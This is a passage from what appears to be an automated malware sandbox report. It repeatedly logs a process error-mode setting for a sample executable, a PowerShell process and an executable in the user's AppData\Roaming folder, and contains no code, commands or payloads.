                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
